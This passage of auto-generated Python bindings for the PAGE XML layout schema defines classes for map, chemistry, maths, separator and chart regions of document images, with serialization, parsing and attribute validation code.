        """Initialise, forwarding all shared RegionType members to the superclass."""
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("MapRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, MapRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if MapRegionType.subclass:
            return MapRegionType.subclass(*args_, **kwargs_)
        else:
            return MapRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def hasContent_(self):
        """Return True when there is child content to serialize."""
        if (
            super(MapRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MapRegionType', pretty_print=True):
        """Serialize this region as XML to *outfile* at the given indent level."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('MapRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'MapRegionType':
            # Preserve the tag name the element had in the source document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MapRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MapRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MapRegionType'):
        """Write inherited attributes, then the optional orientation attribute."""
        super(MapRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MapRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MapRegionType', fromsubclass_=False, pretty_print=True):
        """Write child elements; all children come from RegionType."""
        super(MapRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            # Strip the namespace URI; dispatch on the local tag name only.
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the optional orientation attribute, then delegate to RegionType."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        super(MapRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse a child element; MapRegionType declares no children of its own."""
        super(MapRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class MapRegionType
class ChemRegionType(RegionType):
    """Regions containing chemical formulas.

    XML attributes (both optional):
        orientation -- the angle (degrees) the rectangle encapsulating the
            region has to be rotated clockwise to correct the present skew
            (negative values indicate anti-clockwise rotation).
            Range: -179.999,180
        bgColour -- the background colour of the region
            (pc:ColourSimpleType enumeration).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("ChemRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ChemRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ChemRegionType.subclass:
            return ChemRegionType.subclass(*args_, **kwargs_)
        else:
            return ChemRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def validate_ColourSimpleType(self, value):
        """Validate type pc:ColourSimpleType, a restriction on string.

        Returns True when *value* is valid (or validation is disabled /
        value is None), False otherwise.  Failures are also reported
        through ``self.gds_collector_``.
        """
        # Fixed: ``result`` was previously assigned without initialization
        # and never returned, so the method silently returned None on the
        # enum-mismatch and success paths.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when there is child content to serialize."""
        if (
            super(ChemRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChemRegionType', pretty_print=True):
        """Serialize this region as XML to *outfile* at the given indent level."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ChemRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'ChemRegionType':
            # Preserve the tag name the element had in the source document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChemRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ChemRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ChemRegionType'):
        """Write inherited attributes, then this type's own optional attributes."""
        super(ChemRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChemRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChemRegionType', fromsubclass_=False, pretty_print=True):
        """Write child elements; all children come from RegionType."""
        super(ChemRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this type's own attributes, then delegate to RegionType."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour)    # validate type ColourSimpleType
        super(ChemRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse a child element; ChemRegionType declares no children of its own."""
        super(ChemRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class ChemRegionType
class MathsRegionType(RegionType):
    """Regions containing equations and mathematical symbols.

    XML attributes (both optional):
        orientation -- the angle (degrees) the rectangle encapsulating the
            region has to be rotated clockwise to correct the present skew
            (negative values indicate anti-clockwise rotation).
            Range: -179.999,180
        bgColour -- the background colour of the region
            (pc:ColourSimpleType enumeration).
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, bgColour=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("MathsRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, MathsRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if MathsRegionType.subclass:
            return MathsRegionType.subclass(*args_, **kwargs_)
        else:
            return MathsRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def validate_ColourSimpleType(self, value):
        """Validate type pc:ColourSimpleType, a restriction on string.

        Returns True when *value* is valid (or validation is disabled /
        value is None), False otherwise.  Failures are also reported
        through ``self.gds_collector_``.
        """
        # Fixed: ``result`` was previously assigned without initialization
        # and never returned, so the method silently returned None on the
        # enum-mismatch and success paths.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when there is child content to serialize."""
        if (
            super(MathsRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MathsRegionType', pretty_print=True):
        """Serialize this region as XML to *outfile* at the given indent level."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('MathsRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'MathsRegionType':
            # Preserve the tag name the element had in the source document.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MathsRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='MathsRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='MathsRegionType'):
        """Write inherited attributes, then this type's own optional attributes."""
        super(MathsRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='MathsRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='MathsRegionType', fromsubclass_=False, pretty_print=True):
        """Write child elements; all children come from RegionType."""
        super(MathsRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse this type's own attributes, then delegate to RegionType."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour)    # validate type ColourSimpleType
        super(MathsRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        """Parse a child element; MathsRegionType declares no children of its own."""
        super(MathsRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class MathsRegionType
class SeparatorRegionType(RegionType):
    """Separators are lines that lie between columns and
    paragraphs and can be used to logically separate
    different articles from each other.
    The angle the rectangle encapsulating a region
    has to be rotated in clockwise direction
    in order to correct the present skew
    (negative values indicate anti-clockwise rotation).
    Range: -179.999,180
    The colour of the separator"""
    __hash__ = GeneratedsSuper.__hash__
    # Introspection metadata for this type's XML attributes, consumed by the
    # generateDS runtime helpers.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('colour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, colour=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("SeparatorRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.colour = _cast(None, colour)
        self.colour_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Prefer an application-registered subclass (via the subclass module
        # or the class-level ``subclass`` hook) over the generated type.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, SeparatorRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if SeparatorRegionType.subclass:
            return SeparatorRegionType.subclass(*args_, **kwargs_)
        else:
            return SeparatorRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_colour(self):
        return self.colour
    def set_colour(self, colour):
        self.colour = colour
    def validate_ColourSimpleType(self, value):
        # Validate type pc:ColourSimpleType, a restriction on string.
        # Returns False when a violation was recorded with the collector,
        # True otherwise (validation is skipped when no collector is set).
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # Bug fix: the generated code assigned "result = False" here
                # but never returned it, so enumeration failures fell through
                # and returned None instead of False.
                return False
        return True
    def hasContent_(self):
        # No child elements of its own; content presence is decided entirely
        # by the RegionType superclass.
        if (
            super(SeparatorRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='SeparatorRegionType', pretty_print=True):
        # Serialise this element (start tag, attributes, children, end tag)
        # to *outfile* at the given indentation *level*.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('SeparatorRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'SeparatorRegionType':
            # Preserve the tag name the element was originally parsed under.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='SeparatorRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='SeparatorRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='SeparatorRegionType'):
        # Superclass attributes first, then this type's own attributes.
        super(SeparatorRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='SeparatorRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.colour is not None and 'colour' not in already_processed:
            already_processed.add('colour')
            outfile.write(' colour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.colour), input_name='colour')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='SeparatorRegionType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate to the superclass.
        super(SeparatorRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this object from an element-tree *node*; returns self.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse this type's own attributes, then the shared region attributes.
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('colour', node)
        if value is not None and 'colour' not in already_processed:
            already_processed.add('colour')
            self.colour = value
            self.validate_ColourSimpleType(self.colour) # validate type ColourSimpleType
        super(SeparatorRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No children of its own; delegate to the superclass.
        super(SeparatorRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class SeparatorRegionType
class ChartRegionType(RegionType):
    """Regions containing charts or graphs of any type, should
    be marked as chart regions.
    The angle the rectangle encapsulating a region
    has to be rotated in clockwise direction
    in order to correct the present skew
    (negative values indicate anti-clockwise rotation).
    Range: -179.999,180
    The type of chart in the region
    An approximation of the number of colours
    used in the region
    The background colour of the region
    Specifies whether the region also contains
    text"""
    __hash__ = GeneratedsSuper.__hash__
    # Introspection metadata for this type's XML attributes, consumed by the
    # generateDS runtime helpers.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:ChartTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('numColours', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, type_=None, numColours=None, bgColour=None, embText=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("ChartRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.numColours = _cast(int, numColours)
        self.numColours_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
        self.embText = _cast(bool, embText)
        self.embText_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Prefer an application-registered subclass (via the subclass module
        # or the class-level ``subclass`` hook) over the generated type.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ChartRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if ChartRegionType.subclass:
            return ChartRegionType.subclass(*args_, **kwargs_)
        else:
            return ChartRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_numColours(self):
        return self.numColours
    def set_numColours(self, numColours):
        self.numColours = numColours
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def get_embText(self):
        return self.embText
    def set_embText(self, embText):
        self.embText = embText
    def validate_ChartTypeSimpleType(self, value):
        # Validate type pc:ChartTypeSimpleType, a restriction on string.
        # Returns False when a violation was recorded with the collector,
        # True otherwise (validation is skipped when no collector is set).
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['bar', 'line', 'pie', 'scatter', 'surface', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ChartTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # Bug fix: the generated code assigned "result = False" here
                # but never returned it, so enumeration failures fell through
                # and returned None instead of False.
                return False
        return True
    def validate_ColourSimpleType(self, value):
        # Validate type pc:ColourSimpleType, a restriction on string.
        # Returns False when a violation was recorded with the collector,
